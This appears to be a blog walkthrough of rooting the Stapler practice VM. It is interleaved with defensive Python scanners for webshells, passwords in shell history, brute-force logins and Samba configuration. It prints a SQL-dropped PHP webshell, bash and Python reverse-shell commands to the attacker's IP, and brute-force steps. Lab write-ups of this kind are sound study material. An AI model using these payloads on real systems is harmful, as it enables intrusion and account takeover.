Today we are going to get root on Stapler, a VM created by g0tmi1k. I have tried really hard on this VM, due to multiple careless mistakes (e.g. overlooking some of the scan output) and almost got lost in a bunch of people's names while “dumpster diving” in the VM. But it is REALLY fun. I have tried lots of approaches to pwn it.
Method 1 – web app exploitation
Trying SSH, FTP and that strange port 666 gives you a bunch of people's names; we will see them again later. Scanning port 80 turns out to be useless, but soon we find out that port 12380 is another web service to play with.
By the way, using netcat on port 666 gives you a .zip file, and an image once you unzip it. You also get this message:
And this (real?) message after you run strings on it:
Strange enough. I don’t know how to use it in exploitation.
Anyway, let's get back to a successful approach I have tried.
Nikto on port 12380 tells us that SSL is used and that there are three interesting directories: /admin112233, /blogblog/ and /phpmyadmin/. We found that /blogblog/ is running WordPress. After playing with it for a while, we found this plugin:
Let's look for public exploits for this plugin, “advanced-video”. Luckily we found one:
It is an LFI exploit. Copy the .py file to our working directory and edit the url to https://<Stapler’s IP>:12380/blogblog, then go to /wp-content/uploads, where we can see that some files have been included:
They are named with random numbers, so we need to check them one by one to see whether any of them is interesting. Finally we found one containing some MySQL config. And luckily, root has no password! So let's go to https://<Stapler’s IP>:12380/phpmyadmin and log in as “root” with no password.
Now we can upload a backdoor to Stapler with an SQL command:
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/cmd.php"
(You can type this command in the textbox that appears after clicking “database” at the top of the phpMyAdmin homepage)
This creates a PHP file that reads a parameter called ‘cmd’ and executes it in Stapler's shell, in the directory shown above. That means you can run any Linux command you want through the ‘cmd’ parameter. In practice, we mostly use it like this:
https://<Stapler's IP>:12380/wp-content/uploads/cmd.php?cmd=bash -i >& /dev/tcp/<kali's IP>/443/ 0>&1
and listen with netcat on port 443 to get a bash shell. That does not work here, since we have no permission to call “bash”. Luckily, we have an alternative:
https://<Stapler's IP>:12380/wp-content/uploads/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<kali's IP>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Credit to pentestmonkey. So we have a reverse shell now:
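From the defender's side, the webshell above has two properties worth alerting on: PHP source sitting in wp-content/uploads at all (that directory should hold only uploaded media), and an execution sink such as system() fed straight from $_GET or $_POST. A file dropped with SELECT ... INTO OUTFILE is also owned by the MySQL service account rather than the web server user, which is a third, independent signal. The scanner below is an added example written for this post; it is not code from the page or from g0tmi1k's VM. The sink and source lists, the sample file contents and the temporary directory it scans are all constructed for the demonstration.

```python
from __future__ import annotations
import os
import re
import tempfile

# Command/code execution sinks a one-line PHP webshell relies on.
# Assumption: this list is ours, not from the page; extend it for your estate.
EXEC_SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Request-controlled sources, such as the 'cmd' GET parameter used on this page.
REQUEST_SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
ANY_SINK = re.compile(rf"\b{EXEC_SINKS}\s*\(", re.IGNORECASE)
SINK_WITH_SOURCE = re.compile(
    rf"\b{EXEC_SINKS}\s*\(\s*[^)]*{REQUEST_SOURCES}", re.IGNORECASE)


def scan_php_source(src: str) -> list[str]:
    """Classify one file's contents. An uploads directory should hold no PHP
    at all, so any open tag is a finding; a sink fed straight from the request
    is the classic one-line webshell."""
    findings: list[str] = []
    if not PHP_TAG.search(src):
        return findings
    findings.append("php-code-in-uploads")
    if SINK_WITH_SOURCE.search(src):
        findings.append("request-controlled-exec")
    elif ANY_SINK.search(src):
        findings.append("exec-sink")
    return findings


def scan_directory(root: str, expected_uid: int | None = None) -> dict[str, list[str]]:
    """Walk an uploads tree and report suspicious files keyed by relative path.
    A file written through MySQL's INTO OUTFILE is owned by the database user,
    not the web server user, so an unexpected owner is reported as its own finding."""
    report: dict[str, list[str]] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                src = fh.read(65536).decode("utf-8", errors="replace")
            findings = scan_php_source(src)
            if expected_uid is not None and os.stat(path).st_uid != expected_uid:
                findings.append("unexpected-owner")
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


# Constructed sample uploads directory (not taken from the VM).
SAMPLES = {
    "2016/photo.jpg": b"\xff\xd8\xff\xe0JFIF fake image bytes",
    "cmd.php": b"<?php system($_GET['cmd']);?>",
    "notes.txt": b"just a text file",
    "cache.php": b"<?php echo 'static cache'; ?>",
    "x.jpg.php": b"<?php eval(base64_decode($_POST['p'])); ?>",
}


def demo() -> dict[str, list[str]]:
    """Write the constructed samples to a temp dir and scan it as the current user,
    so only content-based findings fire (no owner mismatch in this demo)."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        return scan_directory(root, expected_uid=os.getuid())


if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        print(f"{path}: {', '.join(findings)}")
```

Run it against a real site with scan_directory("/var/www/.../wp-content/uploads", expected_uid=<uid of www-data>); the content checks are deliberately loose (they also catch double-extension names like x.jpg.php), so treat hits as triage candidates rather than verdicts. The preventive counterpart is to disable PHP execution in the uploads directory at the web server and to keep MySQL's secure_file_priv set so that INTO OUTFILE cannot write into the document root.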
We then found that there was a user called “peter” and a file called “sudo_as_admin_successful”. Interesting, but we have no permission to touch the things that belong to him. After some further searching, we discovered that a user called JKanode had been doing something special:
So let's check out what commands this user has entered. Navigate to /home/JKanode and type cat .bash_history: we get JKanode's password, and peter's too!
So we can now SSH to Stapler with peter's password. We can use sudo to change root's password to anything we wish! Done! Below is the flag:
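Passwords end up in shell history whenever they are passed on the command line, and a history file is readable by anyone who reaches that account. A periodic audit that finds such lines (and reports them redacted, so the report itself does not become a second copy of the secret) is the defensive counterpart to what happened here. This is an added example written for this post, not code from the page; the command patterns and the sample history lines are constructed, and audit_home_dirs assumes the usual /home/<user>/.<shell>_history layout.

```python
from __future__ import annotations
import os
import re

# Commands that accept a secret on the command line; group 1 is the secret.
# Assumption: this list is ours (not from the page); extend it for your estate.
LEAK_PATTERNS = [
    ("sshpass", re.compile(r"\bsshpass\b.*?\s-p\s*(\S+)")),
    ("mysql", re.compile(r"\bmysql\b.*?\s(?:-p|--password=)(\S+)")),
    ("curl-u", re.compile(r"\bcurl\b.*?\s-u\s*[^\s:]+:(\S+)")),
    ("url-credentials", re.compile(r"://[^\s/:@]+:([^\s@/]+)@")),
    ("password-flag", re.compile(r"--(?:password|passwd|pass)[= ](\S+)")),
]

HISTORY_FILES = (".bash_history", ".zsh_history", ".sh_history", ".mysql_history")


def find_leaked_credentials(lines) -> list[dict]:
    """Return one finding per offending line, with the secret replaced by ***."""
    hits: list[dict] = []
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        for kind, pat in LEAK_PATTERNS:
            m = pat.search(line)
            if m:
                redacted = line[:m.start(1)] + "***" + line[m.end(1):]
                hits.append({"line": no, "kind": kind, "command": redacted})
                break  # one finding per line is enough
    return hits


def audit_home_dirs(base: str = "/home") -> dict[str, list[dict]]:
    """Audit the shell history files of every home directory under base.
    Reading other users' history needs root; unreadable files are skipped."""
    report: dict[str, list[dict]] = {}
    users = sorted(os.listdir(base)) if os.path.isdir(base) else []
    for user in users:
        for fname in HISTORY_FILES:
            path = os.path.join(base, user, fname)
            if not os.path.isfile(path):
                continue
            try:
                with open(path, errors="replace") as fh:
                    hits = find_leaked_credentials(fh)
            except PermissionError:
                continue
            if hits:
                report[path] = hits
    return report


# Constructed sample history (the secrets here are made up for the demo).
SAMPLE_HISTORY = """\
ls -la
sshpass -p Hunter2! ssh alice@localhost
mysql -u root -pSecretDb wordpress
git pull
curl -u bob:letmein https://intranet.example/api
wget ftp://ftp_user:ftp_pw@files.example/backup.tgz
mysqldump --password=DumpMe wordpress > backup.sql
cat /etc/passwd
"""


if __name__ == "__main__":
    for hit in find_leaked_credentials(SAMPLE_HISTORY.splitlines()):
        print(f"line {hit['line']:3} [{hit['kind']}] {hit['command']}")
```

The fix on the user side is to stop putting secrets on the command line (ssh keys instead of sshpass, mysql's login-path or a protected option file instead of -p); on the host side, history files should be mode 0600 and any password found this way should be treated as burned and rotated.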
Method 2 – FTP
Since FTP is running on Stapler, why don't we try to log in as anonymous? We found a file called note in the anonymous account:
So what is this note for?
Update the payload? There must be something to discover in Elly's FTP account. So let's see if we can brute-force our way into it:
Lucky for us! Elly is using a weak password!
*Remark: -e nsr checks whether the users have a null password, a password equal to the username, or the reversed username as password.
After poking around in Elly's FTP account, we found a file called passwd which seems to be a copy of /etc/passwd. Using cut -d ':' -f1 passwd > pass.txt to put all the usernames into a file named pass.txt, we can again brute-force SSH using this name list:
Once we have access, we can use the same method as above to get peter's password and do anything as root. Done.
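Both brute-force steps in this method leave a distinctive trail: a burst of failed logins from one source, many different usernames tried from that source (the passwd list sprayed over SSH), and finally a successful login from the same source right after the failures. The analyser below turns sshd and vsftpd log lines into those three alerts. It is an added example written for this post, not code from the page or from the VM; the log lines are constructed in the standard OpenSSH and vsftpd formats, and the thresholds are assumptions to tune for your environment.

```python
from __future__ import annotations
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth.log line, e.g. "... sshd[2001]: Failed password for root from 192.0.2.10 port 40001 ssh2"
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>[\d.]+) port \d+')
# vsftpd.log line, e.g. 'Thu Jan 14 10:05:01 2016 [pid 3001] [elly] FAIL LOGIN: Client "192.0.2.10"'
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'(?P<result>FAIL|OK) LOGIN: Client "(?P<ip>[\d.]+)"')


def parse_line(line: str) -> dict | None:
    """Normalise one log line into an event, or None if it is not a login record."""
    m = SSHD_RE.match(line)
    if m:
        return {"ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"), "service": "ssh",
                "ip": m["ip"], "user": m["user"], "ok": m["result"] == "Accepted"}
    m = VSFTPD_RE.match(line)
    if m:
        return {"ts": datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), "service": "ftp",
                "ip": m["ip"], "user": m["user"], "ok": m["result"] == "OK"}
    return None


def detect(events, window_seconds=60, fail_threshold=5, spray_threshold=3, prior_failures=3):
    """Group events by (source IP, service) and raise alerts for
    bursts of failures, many distinct usernames, and success after failures."""
    groups: dict[tuple[str, str], list[dict]] = defaultdict(list)
    for ev in events:
        groups[(ev["ip"], ev["service"])].append(ev)
    alerts = []
    for (ip, service), evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if not e["ok"]]
        # Peak number of failures inside any sliding window of window_seconds.
        peak = 0
        for i, start in enumerate(failures):
            n = sum(1 for e in failures[i:]
                    if (e["ts"] - start["ts"]).total_seconds() <= window_seconds)
            peak = max(peak, n)
        if peak >= fail_threshold:
            alerts.append({"ip": ip, "service": service, "kind": "brute-force",
                           "detail": f"{peak} failures within {window_seconds}s"})
        users = {e["user"] for e in failures}
        if len(users) >= spray_threshold:
            alerts.append({"ip": ip, "service": service, "kind": "username-spray",
                           "detail": f"{len(users)} distinct usernames tried"})
        seen = 0
        for e in evs:
            if e["ok"] and seen >= prior_failures:
                alerts.append({"ip": ip, "service": service, "kind": "success-after-failures",
                               "detail": f"user {e['user']} accepted after {seen} failures"})
                break
            if not e["ok"]:
                seen += 1
    alerts.sort(key=lambda a: (a["ip"], a["service"], a["kind"]))
    return alerts


def analyze(lines) -> list[dict]:
    return detect(ev for ev in map(parse_line, lines) if ev)


# Constructed sample: one source spraying usernames over SSH and hammering one
# FTP account, plus a second source with an ordinary mistyped password.
SAMPLE_LOG = """\
Jan 14 10:01:01 stapler sshd[2001]: Failed password for root from 192.0.2.10 port 40001 ssh2
Jan 14 10:01:02 stapler sshd[2002]: Failed password for invalid user oracle from 192.0.2.10 port 40002 ssh2
Jan 14 10:01:02 stapler sshd[2003]: Failed password for invalid user postgres from 192.0.2.10 port 40003 ssh2
Jan 14 10:01:03 stapler sshd[2004]: Failed password for elly from 192.0.2.10 port 40004 ssh2
Jan 14 10:01:04 stapler sshd[2005]: Failed password for www-data from 192.0.2.10 port 40005 ssh2
Jan 14 10:01:05 stapler sshd[2006]: Failed password for peter from 192.0.2.10 port 40006 ssh2
Jan 14 10:01:09 stapler sshd[2007]: Accepted password for peter from 192.0.2.10 port 40007 ssh2
Jan 14 10:30:00 stapler sshd[2100]: Failed password for alice from 198.51.100.7 port 50001 ssh2
Jan 14 10:30:05 stapler sshd[2101]: Accepted password for alice from 198.51.100.7 port 50002 ssh2
Thu Jan 14 10:05:01 2016 [pid 3001] [elly] FAIL LOGIN: Client "192.0.2.10"
Thu Jan 14 10:05:02 2016 [pid 3002] [elly] FAIL LOGIN: Client "192.0.2.10"
Thu Jan 14 10:05:02 2016 [pid 3003] [elly] FAIL LOGIN: Client "192.0.2.10"
Thu Jan 14 10:05:03 2016 [pid 3004] [elly] FAIL LOGIN: Client "192.0.2.10"
Thu Jan 14 10:05:04 2016 [pid 3005] [elly] FAIL LOGIN: Client "192.0.2.10"
Thu Jan 14 10:05:06 2016 [pid 3006] [elly] OK LOGIN: Client "192.0.2.10"
"""


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']} {a['service']:3} {a['kind']}: {a['detail']}")
```

The "success-after-failures" alert is the one worth paging on: a burst of failures alone may be a scanner, but a burst followed by an accepted login from the same source is the signature of a guessed password. On the prevention side, the same observation is what fail2ban keys on, and both findings in this method (a password equal to the username, anonymous FTP exposing a copy of /etc/passwd) are configuration problems rather than detection problems.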
Method 3 – Samba
Since Samba is running on port 139, we can use enum4linux to enumerate usernames:
Again, you can try to brute-force these usernames.
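The reason enum4linux can list accounts is that Samba, by default, accepts anonymous (null-session) connections to IPC$, and a misconfigured server may also map failed logins to a guest account or expose guest-readable shares. The audit below reads an smb.conf and flags those settings, with a weak and a hardened configuration side by side. It is an added example written for this post, not code from the page or from the Samba project; the two configurations are constructed, and the option names are the standard smb.conf(5) ones.

```python
from __future__ import annotations
import configparser

# smb.conf is INI-like: sections are shares, [global] holds server settings.
# configparser lowercases option names, so look-ups below use lowercase.

def load_smb_conf(text: str) -> configparser.ConfigParser:
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",),
                                   comment_prefixes=("#", ";"), empty_lines_in_values=False)
    cp.read_string(text)
    return cp


def _get(section, name: str, default: str) -> str:
    """Read an option with its Samba default, normalised to lowercase."""
    if section is None:
        return default
    return section.get(name, default).strip().lower()


def audit_smb_conf(text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing flagged."""
    cp = load_smb_conf(text)
    g = cp["global"] if cp.has_section("global") else None
    findings: list[str] = []
    # Samba default is 0: anonymous IPC$ sessions, and user enumeration over them, allowed.
    if _get(g, "restrict anonymous", "0") == "0":
        findings.append("global: restrict anonymous = 0, null-session access to IPC$ is allowed; set 2")
    mtg = _get(g, "map to guest", "never")
    if mtg != "never":
        findings.append(f"global: map to guest = {mtg}, failed logins become guest sessions")
    if _get(g, "null passwords", "no") == "yes":
        findings.append("global: null passwords = yes, accounts with empty passwords can log in")
    if _get(g, "security", "user") == "share":
        findings.append("global: security = share, obsolete share-level security")
    for name in cp.sections():
        if name == "global":
            continue
        s = cp[name]
        # 'public' is a synonym of 'guest ok'
        if _get(s, "guest ok", "no") == "yes" or _get(s, "public", "no") == "yes":
            findings.append(f"share [{name}]: guest access enabled")
    return findings


# Constructed weak configuration (not the VM's smb.conf).
WEAK_CONF = """\
[global]
workgroup = WORKGROUP
server string = Samba Server
security = user
map to guest = Bad User
restrict anonymous = 0
null passwords = yes

[public]
path = /srv/samba/public
guest ok = yes
browseable = yes

[homes]
browseable = no
read only = no
"""

# The same server with anonymous and guest access closed off.
HARDENED_CONF = """\
[global]
workgroup = WORKGROUP
server string = Samba Server
security = user
map to guest = Never
restrict anonymous = 2
null passwords = no

[public]
path = /srv/samba/public
guest ok = no
valid users = @staff

[homes]
browseable = no
read only = no
"""


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit_smb_conf(conf) or ['no findings']}")
```

Note the trade-off on restrict anonymous = 2: it also blocks the anonymous connections some older clients use for browse lists, so test it with the clients you support before rolling it out. The audit only reads the configuration; verifying the effect still means attempting an unauthenticated connection to your own server after the change.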
Quite a long journey (compared with the previous boot2root VMs I have tackled, the Kioptrix series). Did a lot of enumeration and searching. Tried hard, tried harder. Quite a great experience.